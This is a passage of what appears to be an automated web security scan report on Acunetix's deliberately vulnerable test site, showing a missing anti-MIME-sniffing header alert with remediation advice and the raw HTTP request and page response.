          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        33. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Content-Length: 3761
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3761 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLEirm5BAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2BL5%2FdFSm3qL6WSrtXoxMhBWz78mQ%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17924
          
          
          Response body (17924 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+8ZVr2gCWJCE5ixl1VDrXamngxrA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 